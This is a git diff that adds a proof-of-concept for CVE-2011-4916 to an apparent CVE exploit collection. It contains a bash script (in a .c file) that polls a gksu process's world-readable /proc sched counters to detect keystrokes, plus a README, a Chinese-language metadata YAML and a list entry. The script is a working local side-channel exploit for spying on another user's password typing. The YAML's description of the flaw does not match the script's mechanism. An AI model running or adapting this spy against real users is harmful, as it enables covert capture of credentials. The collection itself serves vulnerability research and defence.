diff --git a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c new file mode 100644 index 0000000000000000000000000000000000000000..df2656d18d267c4d0b5eca166fb9c78acf70162d --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c @@ -0,0 +1,57 @@ +#!/bin/bash +# +# A PoC for spying for keystrokes in gksu in Linux <= 3.1. +# +# /proc/$PID/{sched,schedstat} are world readable, so we can just loop +# on one CPU core while the victim is executed on another, and spy for +# the changes of scheduling counters. The PoC counts only keystrokes number, +# but it can be easily extended to note the delays between the keystrokes +# and do the statistical analysis to learn the input characters. See +# e.g. "Peeping Tom in the Neighborhood: Keystroke Eavesdropping on +# Multi-User Systems" by Kehuan Zhang and XiaoFeng Wang. +# +# It is NOT stable, it only shows a design flaw (the lack of proper +# permission model of procfs debugging counters). The constants are true +# for the author's system only and don't take into account other sources of +# gksu CPU activity. +# +# by segoon from openwall +# +# run as: spy-sched gksu + +PNAME="$1" + +while :; do + PID=`pgrep "$PNAME"` + if [ -n "$PID" ]; then + echo $PID + cd /proc/$PID/ + break + fi + sleep 1 +done + +S=0.0 +while :; do + V=`grep se.exec_start sched 2>/dev/null | cut -d: -f2-` + [ -z "$V" ] && break + if [ "$V" != "$S" ]; then + VAL=`echo "$V - $S" | bc -l` + VALI=`echo $VAL | cut -d. -f1` + [ -z "$VALI" ] && VALI=0 + + if [ "$VALI" -le 815 -a "$VALI" -ge 785 ]; then + # Cursor appeared + : + elif [ $VALI -le 415 -a $VALI -ge 385 ]; then + # Cursor disappeared + : + elif [ $VALI -ge 150 ]; then + echo "$VAL (KEY PRESSED)" + else + echo "$VAL" + fi + + S=$V + fi +done \ No newline at end of file diff --git a/cve/linux-kernel/2011/CVE-2011-4916/README.md b/cve/linux-kernel/2011/CVE-2011-4916/README.md new file mode 100644 index 0000000000000000000000000000000000000000..6ca03d6eec915dca8323e7e512c9d8b8b44e5bf3 --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4916/README.md @@ -0,0 +1,14 @@ +A PoC for spying for keystrokes in gksu in Linux <= 3.1. + +/proc/$PID/{sched,schedstat} are world readable, so we can just loop +on one CPU core while the victim is executed on another, and spy for +the changes of scheduling counters. The PoC counts only keystrokes number, +but it can be easily extended to note the delays between the keystrokes +and do the statistical analysis to learn the input characters. See +e.g. "Peeping Tom in the Neighborhood: Keystroke Eavesdropping on +Multi-User Systems" by Kehuan Zhang and XiaoFeng Wang. + +It is NOT stable, it only shows a design flaw (the lack of proper +permission model of procfs debugging counters). The constants are true +for the author's system only and don't take into account other sources of +gksu CPU activity. \ No newline at end of file diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml new file mode 100644 index 0000000000000000000000000000000000000000..2442cf53bf25b63bd754c9e28f7caa1c270bf1d0 --- /dev/null +++ b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml @@ -0,0 +1,18 @@ +id: CVE-2011-4916 +source: https://www.openwall.com/lists/oss-security/2011/11/05/3 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: medium + description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4916 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4916 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index cf82c0bd64c126427ee669564a1581a3da116ffd..6280d85a77dcc9195f6e460de6e0549a92491a76 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -15,6 +15,7 @@ cve: - CVE-2023-0179 - CVE-2018-18955 - CVE-2011-4917 + - CVE-2011-4916 polkit: - CVE-2021-3560 Outlook: